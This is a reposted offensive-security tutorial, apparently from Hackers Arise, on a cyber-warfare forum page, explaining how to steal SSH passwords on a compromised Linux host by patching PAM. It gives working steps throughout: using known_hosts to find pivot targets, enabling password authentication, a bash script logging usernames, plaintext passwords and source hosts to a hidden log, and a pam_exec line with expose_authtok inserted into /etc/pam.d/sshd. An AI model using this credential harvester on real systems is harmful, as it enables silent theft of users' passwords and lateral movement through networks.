National Cyber Warfare Foundation (NCWF)

Password Cracking: Stealing SSH Credentials with PAM
0 user ratings		2025-09-11 14:52:00
milo
Red Team (CNA)

Patch PAM on Linux to harvest SSH credentials in real time. By adding a logging script into the authentication chain, every password-based login is silently captured.


The post Password Cracking: Stealing SSH Credentials with PAM first appeared on Hackers Arise.



Welcome back, my aspiring cyberwarriors!





Landing on a Linux machine after exploitation or with freshly harvested credentials often feels like a victory, but in reality, it is only the beginning of the struggle. Lateral movement in Linux environments is notoriously trickier than in Windows domains. Even if you manage to obtain root on one host, you might quickly hit a wall: you see evidence of users connecting to other systems, but you don’t have their credentials. Without those, further expansion stalls. Techniques such as dumping memory or scraping process data might work in some cases, but SSH processes in particular won’t reveal user credentials so easily. At first glance, it feels like a dead end.





This is where PAM manipulation comes into play. By modifying how the Pluggable Authentication Module handles logins, it becomes possible to quietly capture user credentials whenever they authenticate. This is how you create a systematic way to harvest SSH passwords and reuse them for lateral movement.





pam patch in action logging credentials




Recon with Known Hosts





Before diving into PAM patching, it is useful to gather some context about the network and where legitimate users are connecting. SSH clients store previously accessed servers in a known_hosts file under each user’s .ssh directory. If those files are accessible, they give a list of destinations without the need for noisy scanning.
For example, inspecting /home/dev3/.ssh/known_hosts might reveal entries such as git. That single clue suggests a pivot point. If the compromised machine is in a restricted environment, that host may sit in another subnet or behind access controls you couldn’t otherwise reach. With the right credentials, this file becomes a roadmap for lateral movement.





using known_hosts file for lateral movement




Preparing the Host





Before implementing a credential capture mechanism, it’s important to ensure the host accepts password-based logins. SSHD can be configured to forbid password authentication entirely, relying solely on key-based access. To enable credential capture, the following must be set in /etc/ssh/sshd_config:





target# > nano /etc/ssh/sshd_config





PasswordAuthentication yes





password authentication with ssh enabled




Once this change is in place, the groundwork is set.





Creating a Logging Script





The next step is creating a small script that will record login attempts. With root privileges, create a new file at /usr/local/bin/logc.sh:





target# > nano /usr/local/bin/logc.sh 





#!/bin/bash

echo "$(date) User: $PAM_USER Password: $(cat -), From: $PAM_RHOST" >> /var/log/.authc.log




creating a PAM Patch




Make it executable:





target# > chmod 777 /usr/local/bin/logc.sh





Then prepare the hidden log file that will quietly collect captured data:





target# > touch /var/log/.authc.log





This script is simple yet powerful. It captures the username, the plaintext password, the source of the connection, and timestamps each entry.





Patching PAM





With the logging script in place, the next task is to insert it into the PAM authentication chain. PAM configurations vary slightly between distributions, but for SSH specifically, the relevant file is /etc/pam.d/sshd. For broader system-wide coverage, other files such as /etc/pam.d/common-auth (Debian/Ubuntu) or /etc/pam.d/password-auth (CentOS) could be patched instead.





To modify SSH authentication only, open /etc/pam.d/sshd and add the following line at the very top:





target# > nano /etc/pam.d/sshd





auth optional pam_exec.so quiet expose_authtok /usr/local/bin/logc.sh




patching PAM to steal ssh credentials




This ensures that every authentication attempt, successful or not, passes through the logging script before continuing with normal PAM processing. Credentials are silently exfiltrated while legitimate users remain unaware.





Applying and Testing the Patch





For the changes to take effect, restart the SSH service:





target# > service sshd restart





Once restarted, test the patch by logging in with valid credentials.





testing the PAM patch




Afterwards, check the log file:





target# > cat /var/log/.authc.log





the PAM patch is valid and working




more credentials were obtained with the PAM patch




Each entry should display the captured user, the password they entered, the remote host they connected from, and the date of the attempt. Over time, this log will accumulate valuable credentials from legitimate user sessions, giving you a resource for lateral movement.





Summary





There is a great method of harvesting SSH credentials on Linux by modifying the Pluggable Authentication Module (PAM). After identifying potential lateral movement targets via known_hosts, SSH is reconfigured to allow password authentication. A custom logging script is created to capture usernames, passwords, and remote sources, and is then integrated into PAM by editing /etc/pam.d/sshd. With the patch in place, every login attempt is silently recorded to a hidden log file. Restarting SSH activates the change, and future connections yield a steady stream of usable credentials. 

The post Password Cracking: Stealing SSH Credentials with PAM first appeared on Hackers Arise.



Source: HackersArise
Source Link: https://hackers-arise.com/password-cracking-stealing-ssh-credentials-with-pam/

Comments
new comment
Nobody has commented yet. Will you be the first?
  
Forum
Red Team (CNA)


Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.